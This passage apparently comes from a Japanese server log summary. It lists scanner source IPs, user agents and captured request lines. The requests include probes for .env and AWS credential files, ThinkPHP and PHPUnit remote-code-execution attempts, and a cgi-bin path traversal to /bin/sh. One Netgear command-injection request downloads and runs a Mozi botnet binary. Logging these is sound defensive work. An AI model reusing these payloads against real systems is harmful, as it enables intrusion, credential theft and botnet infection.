2 157.230.216.203 United States
1 162.142.125.210 United States
1 167.172.247.109 United States
8 185.254.196.223 Ukraine
1 193.56.29.110 United Kingdom
11 193.106.191.48 Russia
1 205.210.31.150 United States

UserAgent一覧

件数 UserAgent
22 -
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
18 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
40 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
28 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
2 -
3 \x03
3 \x16\x03\x01\x01D\x01
1 \x16\x03\x01
1 CONNECT 45[.]85[.]218[.]132:4444 HTTP/1.1
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
27 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
3 GET /?s=/index/ hink
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /auth/.env HTTP/1.1
1 GET /autodiscover/autodiscover.json/v1.0/1@interact.sh?Protocol=Autodiscoverv1 HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /cli/.env HTTP/1.1
1 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /config/.env HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /dependencies/.env HTTP/1.1
1 GET /deployment/.env HTTP/1.1
1 GET /dev/.env HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /document/.env HTTP/1.1
1 GET /engine/.env HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /framework/.env HTTP/1.1
1 GET /frontend/.env HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /laravel-artisa/.env HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /login/.env HTTP/1.1
1 GET /master/.env HTTP/1.1
1 GET /media/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /personal/.env HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /project/.env HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /rest/.env HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /search/.env HTTP/1.1
1 GET /server/.env HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shared/.env HTTP/1.1
1 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /site/.env HTTP/1.1
1 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vod_installer/.env HTTP/1.1
1 GET /vue/.env HTTP/1.1
1 GET /web/.env HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
1 HEAD / HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0